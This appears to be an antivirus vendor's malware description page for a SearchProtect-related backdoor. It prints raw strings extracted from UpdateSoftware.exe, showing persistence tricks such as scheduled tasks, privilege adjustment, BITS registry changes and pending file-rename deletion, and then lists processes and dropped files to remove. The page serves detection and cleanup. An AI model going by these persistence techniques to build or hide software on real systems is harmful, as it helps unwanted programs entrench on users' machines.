Error loading %s

UpdateSoftware.exe_3512:


.text
`.rdata
@.data
.rsrc
9>t.hT
QSShD
j%Xf;
QSSSSSSh
FTPh@z
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
load x
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
F%D,3
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GetCPInfo
zcÁ
[]@%~!#$^&*()_-?|{}=:
/vABmeRfAuIUlkvobQhxXiDGwS02xn6H0U6DZCDHvIATNlPbpqpPOz1QGiLGMhTuXinBPsG7pT5nQKg97KEjbWMXt6UeZQ3NNhWSkbs0PFUOXeu7qBezPy6gssSHDhGJ
Zi2nQbACamsG9bYrezMYBG3eON3SpKpgzmFFwAsx8WzYYuXO8ZwU2xMK0BCbIKOiUywLca74 gTLzQrOE9P3oQjJEb C7MeedGvEN057jMkcN43fYSsHUuXHHGHuDW1l
sNv1rYp5b/fBarCcNVs6LI8Cre5Wy9rfgs65w5W4Ps ImrpT7AvUE7W3IG5n2sF8zuDpVgyctb0YqIS cJL9fK3PBojg0jf2T2boMheAoSIYOafBkNiGxzjAZk7Z6Wzf
20120606
.qsfU
.rt(i
.oQ!YUDp
.Qgdi
.rvNS
.bMc5
%cM`M
%fQ#~
.dzNH
%cjGH
.qSN{
.Zqa|
.ggHI
.QiGf
.qQA:
.HSip
.ar\t
/kUrL
ECmD|
.re0:
.QxF[
.hjgJ
.qi(>
.ozm9
.Zmm_
%ct/x
.Zz(I
.Zg#n
.qZ,M
.nwF5
.IRIl
.Np\L
.rj.}
.QQLr
.rl_R
.re.6
.pp)=
.hu@W
.pWD;
*zkEY
.jjd}
Ý96
.ZMNm
%dx1x
$ftpI
.rn/7
.QrrX
.aoHL
.hRo{
%C|0v
.im9N
.KTC]
.NhQn
%CwEF
.aMmU
.rvcl
.lg-R
.Yd#H
.pzrP
.kWO]
.fn^<
.Po/j
%cxnr
.OqL]
.rvGy
.Ho\>
.np^>
.qhRm
.rnoO
.Gt.m
.Phip
.ehML
.LXeG
.cQ0u
.ylaU
.Yq,Y
.rv>Q
.zx[o
.qsHI
.JZf<
.Qxmr
.qlkv
.Psf9
.rqO4
.dg9>
.Cyp5
.qi;7
.jl?H
%fRg7
.ayA\
.rvFp
.LtpP
%dpDs
.kw>M
.bh'R
.GpRH
%dri5
.IgDm
.pvfs
.gp_J
.MW-;
.jgp\
.Gnb9
.KoZ[
.zM)n
.rtZN
.Ke`i
.rvGU
.dMmv
.mR1Y
.rh#v
.iV9L
.rrF[
.Qf?M
.nRlf
.jr1;
.MZ-x
.rvEQ
.rmA\
-eqJ}
.MX/=
.iVBs
.rtaI
.lW^<
.iTAP
.nx*9
.pT>h
.jR]y
.Ckov
.YW@9
.Qk==
.zw@<
.gx>F
%fm]k
.kvfJ
.Iw'S
.bsn[
.eq;M
.rh;f
.fmbZ
%fw.Pqnu
.OZe8
.rvGX
.fTY7
.geEK
%fZit
.PZEJ
.pt-J
.lUgn
%fgLp
.ZyIw
.rR][
.Pieq
.Znfl
.krft
.fuYP
.Lp0o
.OYD4
.qsMF
.id;I
.Kr_t
.Nsq4
.bsr:
.QfkQ
.rhe4
.rh.ZWZf
.pzmn
.yiJh
.bjRf
.qo9i
.Yy<\
%cSPL
.ltQl
.dZRK
.pkn\
.KV.y
.qVRh
.KpQu
.yfbs
.cgJn
.rZ.j
.lnfl
.rep7
.rs-N
.fxL;
.Mv;l
.duY:
.jf@;
.IYKJ
%coE\
'LkEY
.rt(G
.dc1x
.bqHg
.oS^_
.mQ[t
.Nc\I
.mu,N
.CfR]
.NSgw
.mv]m
.rjrn
%cm#z
.Yv`s
.rhoT
.QifO
%dlYM
.iwmt
.eoZt
.qlHv
.GlL^
.if=L
.rx)j
.rx.rrP8
%doFT
.awDK
%fn;G
.qr14
.OzRY
%ciI7
.gh0u
.rqQX
.qwry
.qwqx
.rweo
.PSOp
.btY9
.rv:x
.QvGf
.pvEi
.IT 9
.YyL[
.rr_^
.pp\s
.ltmO
.kqg5
.roKX
.QgkR
.dj@Z
.ri \
.rkD8
.dxA<
.yno4
.rp/F
.Ccrf
.frJO
.rokz
%Ck1>
.rsJO
.rpNp
%dMQX
.ks>K
.Qp(6
.Go\{
.bhNX
.rpjM
.Yd;I
.HS*8
.OzET
.ro(m
.agnk
.ro 9
.Ne?0
.PuC^
.oo=j
.qw-4
.yWD4
.rpMh
.oo\h
.qq9N
.lqY{
.aM,T
%fkO^
%fhoh
.rmM5
.quMR
.rmEH
.rr@6
.rmOS
.zmRW
.rweP
.monF
.ri#5
.rxaf
.rhE7
.OZ14
%CXG=
.roLQ
.kwIt
.es94
.rvHK
.rr'q
.ae<\
.HS _
.rvB_
.rqKU
.JqLs
.qZng
.rqaT
.rvc8
.jQP_
.rvHN
.deIP
.hc:l
.ifO^
.rsGH
.pR]{
.ph-;
.ri;Z
.am=L
.rx(W
.rxYN
.rxZP
.inhS
.mt\]
.riB0
.Qnpg
.qxrm
%Cwp4
.rs;Y
.rvG_
.Qo*;
.fr<:
.pq9n
%Cz9r
.YY)w
.dT1l
.ySMU
.PYf]
.mmdV
.Oy)]
%Cmq[
.dTl~
.rha<
.Ol?J
.ro?x
.nn`H
.mi(y
<|uDP
.pZm8
.QkfJ
.koAY
-ywm}
$HsqL
%dZgm
.oz\q
.NUZo
.zQ.moIk
.Gm#s
.kopG
.GQn8
.ri)j
.ogaJ
.Pi>R
.opjq
.QqZ>
.nYMF
.bo:y
Î^F
.Pi\P
.ZT=7
.QzbH
.qTl[
.reb|
.Jl.6
.QlgU
.Phb{
.qhKP
.cm\j
.LQ.Hm^Z
.ogaQ
.jY,U
%cqd{
.ne-~
.ey(w
c:\documents and settings\all users\application data\softsafe\updatesoftware\UpdateSoftware.exe
?456789:;<=
!"#$%&'()* ,-./0123
'()*#$%&
>?:;<=9876540123,-./
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
portuguese-brazilian
USER32.DLL
5476476
4740740
10001000
2303303
6874874
7144144
5%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
8808808
6174174
4364364
8129129
5673673
6281281
5175175
7869869
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)
DeleteFile('%s') E1:%d;E2:%d
DeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%d
DeleteFile('%s') OK
'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}
execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting  %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s
: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated
['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%d
E:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},
file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install  E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
7382382
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

nshBF.exe:2008
putfu.exe:2928
sp-downloader.exe:1716
CltMngSvc.exe:1784
CltMngSvc.exe:1640
nsoBA.tmp:2012
cltmng.exe:996
usetup.exe:3420
cltmngui.exe:1296
rundll32.exe:3116
rundll32.exe:3052
%original file name%.exe:312
nsuB5.exe:516
nsuC3.exe:2608
UpdateSoftware.exe:3512
UpdateSoftware.exe:3456
Delete the original Backdoor file.
Delete or disinfect the following files created/modified by the Backdoor:

%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (30 bytes)
%Program Files%\ProgramUpdater\Assistant.dll (264574 bytes)
%Program Files%\ProgramUpdater\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (11736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\downloadstub[1] (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB3.tmp (7189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe (11736 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_checked.png (360 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgUninstall.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\v.png (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64.dll (103387 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32.dll (287458 bytes)
%Program Files%\SearchProtect\EULA.txt (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-onclick.png (2 bytes)
%Program Files%\SearchProtect\Main\bin\uninstall.exe (33747 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC3.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.css (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-selected.png (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\x.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button2.png (886 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnSilver.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\main.js (10 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox.png (378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnClose.png (933 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\json2.min.js (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettings.png (12 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPTool64.exe (50351 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\defaults.js (983 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez.png (256 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-over-click.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button.png (859 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\bin\cltmngui.exe (100378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\gray-bg.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\style.css (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettingsDS.png (9 bytes)
%Program Files%\SearchProtect\Main\bin\CltMngSvc.exe (96792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (81046 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\cltmng.exe (170836 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-uninstall.png (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\info-icon.png (424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\browsers32.sdb (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.js (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\SPDialogAPI.js (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings.html (8 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgNotif.png (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.html (12 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.html (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Settings-icon.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-with-logo.png (1552 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-selected.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-Rollover.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-rollover.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\text-field.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshBF.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.css (4 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_def.png (274 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\icon-win.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\dialogUtils.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnBlue.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\button-bg.png (1 bytes)
%Program Files%\SearchProtect\Main\bin\SPTool.dll (81046 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (478 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C2.tmp (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\defaults.js (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (6584 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-default.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszBE.tmp (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-selected.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CT3309297[1] (649 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.js (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\defaults.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqBC.tmp (698645 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserSettings.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\UpdateSoftware.exe (33792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI\rep\UIRepository.dat (1057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp.tmp (808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\general_logo[1].bmp (784 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (84 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.dat (14184 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\50b2a4e2b05f1a96cb606980e48cc21e.log (3036232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_2[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7306_appcompat.txt (214 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe (5064 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB8.tmp (10114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.tmp (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (30 bytes)
%WinDir%\Tasks\UpdateSoftware-S-3956077583.job (692 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\3956077583.ini (42494 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

SearchProtectToolbar_50b2a4e2b0

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

SearchProtectToolbar_50b2a4e2b0

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet